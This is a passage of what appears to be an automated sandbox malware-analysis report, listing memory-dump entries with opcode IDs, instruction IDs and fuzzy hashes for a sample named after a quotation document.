                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                          • Instruction ID: 10287e60cf42a49d762ab8a094b7ef21403ab463f8c62ae5d0173e2c9c8e753a
                                          • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                          • Instruction Fuzzy Hash: FD21F4B5A40B059FD3A0CF29C441B52BBF4FB48B20F10892AE98AC7B40E771E814DB90
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                          • Instruction ID: 28cb6e44c56bf818d7e3ee07d54c1cc1ec1ad8e0ab2be5e4ee6eead88065a05d
                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                          • Instruction Fuzzy Hash: 86110232A00640EFDB209F46EC41B1AB7E5EF45760F058428F8089B161EB74DE44FB90
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c5111eebb391756819442a0895355f5c6324e8f9dbe0b1534e98d23d3d5fd09
                                          • Instruction ID: 0447079079bb949c160d4299cebdd98a75d116572c6e102f05d25344d96503c6
                                          • Opcode Fuzzy Hash: 9c5111eebb391756819442a0895355f5c6324e8f9dbe0b1534e98d23d3d5fd09
                                          • Instruction Fuzzy Hash: ED012672B05649AFE726A26ADD45F67779CEF803A4F15407AF8018B641DB18EC00F3A2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8aea84e2d38bfeae8cc8d761f2e6e622ff774923392d7b1809b3e65efe01221f
                                          • Instruction ID: a460a8941362b7b36220069f623e64cbdf098ff7d7ef48ae48817c369c67e9c8
                                          • Opcode Fuzzy Hash: 8aea84e2d38bfeae8cc8d761f2e6e622ff774923392d7b1809b3e65efe01221f
                                          • Instruction Fuzzy Hash: 8511CB76640644AFCB25EF59D980F567BA8EB9AB75F18411AF804CB290C774FC40EFA0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d2d763824cc6439d24d2ec5ef254c23fa69077ecd304c063519a5d4959d9fa92
                                          • Instruction ID: ec46789681bfdc149ce18759a00d4e018c932bb98b7c597d4a3a5875facf19e6
                                          • Opcode Fuzzy Hash: d2d763824cc6439d24d2ec5ef254c23fa69077ecd304c063519a5d4959d9fa92
                                          • Instruction Fuzzy Hash: 6111C272D00714ABEF22DF69CD81B5EF7B8EF84B50F500059E904BB201D735AD01AB50
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 343d6f2c588d44df85538af5a468ce36deb4de78a3be438328df6034640cc481
                                          • Instruction ID: 90b86af32df76d6d816d7eb4a10b723a1414bfb0c7af4155bbbad7501fd2f0e3
                                          • Opcode Fuzzy Hash: 343d6f2c588d44df85538af5a468ce36deb4de78a3be438328df6034640cc481
                                          • Instruction Fuzzy Hash: 5B01B5716002089FC729EF15DD49F66BBF9FB85724F24816AF0058B261D778EC46DB90
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                          • Instruction ID: a71f9f883dc2618a9339ae76b68241a122f5fc62b7bab10c8404c858539a7481
                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                          • Instruction Fuzzy Hash: 9F112932A016C69BD7229718CE45F65B794EB01768F2D00B5ED05CBA42E33CCC45F311
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                          • Instruction ID: e5365750b3ef32ed26c143df5fb4d9f85b1c7a922006a15aaad04d6cb5cba7d9
                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                          • Instruction Fuzzy Hash: B9016832A00144AFD7219F56DC00F5A77A9EF49B60F098034F8148B260E775DD40F790
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                          • Instruction ID: 2b18dd1b9983162f2848a7d116fc4c926b31a80bf9c7858d8eda6934686f5214
                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                          • Instruction Fuzzy Hash: A3012672814B11AFCB308F15EC41A327BA4EF55B71B008A2DFD958B281C735D825EB61
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 11cc2e3ea33fdab801f44f3da13b14144ec375303931695c2169a717793f6164
                                          • Instruction ID: 4c3faecf0b9b8d8e36c0b013346f965444179db5f537499cbade87ff85faf934
                                          • Opcode Fuzzy Hash: 11cc2e3ea33fdab801f44f3da13b14144ec375303931695c2169a717793f6164
                                          • Instruction Fuzzy Hash: E7F062B0A0124DEFCB14EF69C515E5EB7B4EF48300F108056B859EB386DA78EB01DBA1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c09db9da2da8ce73c118bf172fe40dd45f1e471b5b2206eec9497ee09f1fef4f
                                          • Instruction ID: 0f5d60982d39920fce3fe78dd1ef792b56cc1cb9344145ebc034fb9aa2f08a49
                                          • Opcode Fuzzy Hash: c09db9da2da8ce73c118bf172fe40dd45f1e471b5b2206eec9497ee09f1fef4f
                                          • Instruction Fuzzy Hash: 2AF0BE32D166E0DFD733EBB8C444BA1B7D8AB10730F1C896AD49987502CB68FC84E651
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2464d2fb1bda64cad9741ccec41f1b96da60de9efe3991ec8a97a889564873f6
                                          • Instruction ID: f4e89f1b8901d5f25259b52c4342b62c8dd8cdceae5c1967a238d2053339b881
                                          • Opcode Fuzzy Hash: 2464d2fb1bda64cad9741ccec41f1b96da60de9efe3991ec8a97a889564873f6
                                          • Instruction Fuzzy Hash: 2CF05C774157D506CFB26B3CB8603D26FB8A741110F6914C9E8E05720DC67F8483C320
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 684724820b940e8d3f5e502ee78a569cc9cb13974567e8df50b46cec7fa29e1a
                                          • Instruction ID: 63291a9043e5a8699666a92450d7bb601ee1c978e386dab11b1bc6532567a360
                                          • Opcode Fuzzy Hash: 684724820b940e8d3f5e502ee78a569cc9cb13974567e8df50b46cec7fa29e1a
                                          • Instruction Fuzzy Hash: 04F0E2729116509FEB329758C148B5177D8AB40BB0F189526E40EC7552C364CC80EAD1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                          • Instruction ID: e13b3b865f6fe39d6ae816403251be772e2464b44046a4785a8d56b3557030ee
                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                          • Instruction Fuzzy Hash: 91E0D872301A002BD7119E59CCC1F47776EEFC7B10F044479B5045F252C9E6DD0996A4
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                          • Instruction ID: 7304c8cf74223dfa8f75a940a80a8efc2f2ed51cc8e2357336224e1a6e8aa56d
                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                          • Instruction Fuzzy Hash: 08F030725046089FE3208F05DD84F62B7E8EB05764F65C026E709DB561DB7AEC40EBA4
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                          • Instruction ID: 0fb4c3994a1644751551baf762ff877331f0069c47a72affe0cb1af1905c603c
                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                          • Instruction Fuzzy Hash: 31F0ED7A204354ABDB19DF16D040AE67BA8EB51360F204095E8468B341EB35FD82EF81
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                          • Instruction ID: c9416b00b335d04e08679a235f889e6ef482fd3142651d05880de8e048e794d6
                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                          • Instruction Fuzzy Hash: E7E09233684546ABEB211E558C01F6677A59BE67B0F150429E1049B150DB7CEC42FB98
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                          • Instruction ID: 0d5b72f3fdb91601a620e955c89907c3317056627774e2e9062c62a7bf8373c9
                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                          • Instruction Fuzzy Hash: A3E0DF32A00110BBEB2297998D02F9ABEEDEB94FA0F050059B604E70D0E571EE00D690
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 701588877eb0601f5195bf2b8c24780201df00e042f574d284f9c06034e8dcba
                                          • Instruction ID: b37d74ae61a2f7c984fb3f27224f6c6f480d3d8cb8fa27a12eb1f62c49aef4d6
                                          • Opcode Fuzzy Hash: 701588877eb0601f5195bf2b8c24780201df00e042f574d284f9c06034e8dcba
                                          • Instruction Fuzzy Hash: 4F900225211400130205B5594B04547004E87D5391355C032F1016590DDA258962A921
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09c08339c0aea319e7e84d457985c07cbd20fee08b65845b127c1ccd1bf0aaba
                                          • Instruction ID: a91fca4c26f745f300b56b0bc54597563034b60572f76959023ed80e86b8afdf
                                          • Opcode Fuzzy Hash: 09c08339c0aea319e7e84d457985c07cbd20fee08b65845b127c1ccd1bf0aaba
                                          • Instruction Fuzzy Hash: CC9002A1201540A24600B259C804B4A450D87E0341B55C027E10555A0DC9298952E935
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a6a4933bb96e093e9cf1a1809ab041c6850a9aa23f4174b4bb66fda8dfc3af1
                                          • Instruction ID: ae4f6a6fb114133f204992a012043de92c70af0ca0be88bed85a3cfc765914d1
                                          • Opcode Fuzzy Hash: 6a6a4933bb96e093e9cf1a1809ab041c6850a9aa23f4174b4bb66fda8dfc3af1
                                          • Instruction Fuzzy Hash: 0490023120140812D2807159880468A000D87D1341F95C026A0026694ECE198B5ABFA1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 18593c4d5deb221a68463330643cdb24155ca8f243daf8f382198b6b77f46abf
                                          • Instruction ID: ca243397622f7c758cee5436fbc37091b415213b23c5648386c126bda509ec49
                                          • Opcode Fuzzy Hash: 18593c4d5deb221a68463330643cdb24155ca8f243daf8f382198b6b77f46abf
                                          • Instruction Fuzzy Hash: 3690023120544852D24071598804A86001D87D0345F55C022A00656D4E9A298E56FE61
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 90d4f4fc4bd402a3f43b7c3da29b73eb82aa60c8be77ba1a2353b8bb6950c525
                                          • Instruction ID: 55dcafda70ebe4228e06bd195ad1be0736fef6940097c134cdf528cfe3ea3a7c
                                          • Opcode Fuzzy Hash: 90d4f4fc4bd402a3f43b7c3da29b73eb82aa60c8be77ba1a2353b8bb6950c525
                                          • Instruction Fuzzy Hash: DF90023160540812D25071598814786000D87D0341F55C022A0025694E8B598B56BEA1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96639b73bb2ec28c332828ffaa7a49e35758fab7fe832f724a31bde186e85f16
                                          • Instruction ID: c7e8ab841b4ba48defd2b76510caab0e77e6aa35aa49d96702affc0bc2c131a4
                                          • Opcode Fuzzy Hash: 96639b73bb2ec28c332828ffaa7a49e35758fab7fe832f724a31bde186e85f16
                                          • Instruction Fuzzy Hash: E590023120140812D20471598C046C6000D87D0341F55C022A6025695F9A698992B931
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5581fd2b3a222f5e1eba281e31ab91a986b0c311aeec3459b44737b5d2feab32
                                          • Instruction ID: 97e1d2013da9152f1df81b350c631686fbbf8feb0f9f38ce5e9ceb0e1b6a4d5d
                                          • Opcode Fuzzy Hash: 5581fd2b3a222f5e1eba281e31ab91a986b0c311aeec3459b44737b5d2feab32
                                          • Instruction Fuzzy Hash: 4F90023120140413D20071599908747000D87D0341F55D422A0425598EDA5A8952B921
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c74dff25e8ad925f1ce363e51ab9519aa7e850a17fb609813650338feef4fbf1
                                          • Instruction ID: 5891b1017d33b40f67c713bf04fe6e6b13c2161c455947e52054117448efef1a
                                          • Opcode Fuzzy Hash: c74dff25e8ad925f1ce363e51ab9519aa7e850a17fb609813650338feef4fbf1
                                          • Instruction Fuzzy Hash: C890022160540412D24071599818746001D87D0341F55D022A0025594ECA5D8B56BEA1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e79b20403b355751dcefb45973a9bdd4ef2584fcd0a4482adf275e383743b667
                                          • Instruction ID: 80caca8221f9f677fefc855d4f389d926cee70ad3fde67d0775ff5c72a43f4db
                                          • Opcode Fuzzy Hash: e79b20403b355751dcefb45973a9bdd4ef2584fcd0a4482adf275e383743b667
                                          • Instruction Fuzzy Hash: D490023120140412D20075999808686000D87E0341F55D022A5025595FCA698992B931
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 89df952e1a29c9a73ede26a11ccb990a47bc0f9d8e895659dc20c25941cc2d3e
                                          • Instruction ID: f0f40ce5f8c4ec1ed3ba551031604253709c338b57959480b9b0800dbd400522
                                          • Opcode Fuzzy Hash: 89df952e1a29c9a73ede26a11ccb990a47bc0f9d8e895659dc20c25941cc2d3e
                                          • Instruction Fuzzy Hash: 9A90023120140852D20071598804B86000D87E0341F55C027A0125694E8A19C952BD21
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 332601dfb2fc146872e72fcf099ce144c3624101893f80468f45f363244fe5d9
                                          • Instruction ID: 5fe19c7583913f596dc89300420fd56b877135f3529c58684b996f4a77bc3ab2
                                          • Opcode Fuzzy Hash: 332601dfb2fc146872e72fcf099ce144c3624101893f80468f45f363244fe5d9
                                          • Instruction Fuzzy Hash: 2E900221242441625645B1598804547400E97E0381795C023A1415990D892A9957EE21
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 89b74acba0a9b65afd391fdaf38f2c3bb1619b9aeab395ee79a898f0964dea44
                                          • Instruction ID: 11b08c63c3f82a0d16779b6cc7ce46036c88e9dafae5bab7bee2428777aaa467
                                          • Opcode Fuzzy Hash: 89b74acba0a9b65afd391fdaf38f2c3bb1619b9aeab395ee79a898f0964dea44
                                          • Instruction Fuzzy Hash: B590023124140412D24171598804646000D97D0381F95C023A0425594F8A598B57FE61
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a97d9d900a1cbf1c6377ad48387a1bac1f0f200d101b5fd16632520898d71527
                                          • Instruction ID: 73e4b20276320c7f05b0c421160031cd1ab1214d68379e312b2ce642ca895289
                                          • Opcode Fuzzy Hash: a97d9d900a1cbf1c6377ad48387a1bac1f0f200d101b5fd16632520898d71527
                                          • Instruction Fuzzy Hash: A190022130140013D24071599818646400DD7E1341F55D022E0415594DDD198957AA22
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 109a1e8761db1e10c8ec2a141f5ccfbd795b865be385832e5e24ad218fab9e38
                                          • Instruction ID: f837ec1cc86b8d2e3589bf3321564e26e0bf6fda600643bb72b6bc4ed5f1a6ab
                                          • Opcode Fuzzy Hash: 109a1e8761db1e10c8ec2a141f5ccfbd795b865be385832e5e24ad218fab9e38
                                          • Instruction Fuzzy Hash: 7B90022921340012D2807159980864A000D87D1342F95D426A0016598DCD19896AAB21
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 86461f585d5d5ca2b8491a00a9f1ee51f9bdabe5892304369e9c114bbb61c827
                                          • Instruction ID: 343316d3778babc2014078e2d6ad79cca53c76bfe897223926d2e755fc541597
                                          • Opcode Fuzzy Hash: 86461f585d5d5ca2b8491a00a9f1ee51f9bdabe5892304369e9c114bbb61c827
                                          • Instruction Fuzzy Hash: DB90022120544452D20075599808A46000D87D0345F55D022A10655D5ECA398952F931
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0410027c1b615086832b66163a122902c1f0c17d6fdaed493bc6a973ca174048
                                          • Instruction ID: 966d73bb5ba36d76330070f37821449b7511220dfabb7aef1ef5fb2046b39245
                                          • Opcode Fuzzy Hash: 0410027c1b615086832b66163a122902c1f0c17d6fdaed493bc6a973ca174048
                                          • Instruction Fuzzy Hash: 7090026120180413D24075598C04647000D87D0342F55C022A2065595F8E2D8D52B935
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e8a82d0eaa6a63b0e5eb95f697f655d003105be6e5166c72d3d678cc2a261a6f
                                          • Instruction ID: 9ad8c3458d80543564d95b9e767b6f7f51e4147c63c35160ead749ea85ae80cf
                                          • Opcode Fuzzy Hash: e8a82d0eaa6a63b0e5eb95f697f655d003105be6e5166c72d3d678cc2a261a6f
                                          • Instruction Fuzzy Hash: 2F90027120140412D24071598804786000D87D0341F55C022A5065594F8A5D8ED6BE65
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2fd8df498b9999fe6cadef8bc04fd8daaf120351915c790d375d64a9c23a8d90
                                          • Instruction ID: 62ef8e32681a09d7c0984a491bcf424e107876cd2451b0714901998fc3c36661
                                          • Opcode Fuzzy Hash: 2fd8df498b9999fe6cadef8bc04fd8daaf120351915c790d375d64a9c23a8d90
                                          • Instruction Fuzzy Hash: C790022160140512D20171598804656000E87D0381F95C033A1025595FCE298A93F931
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
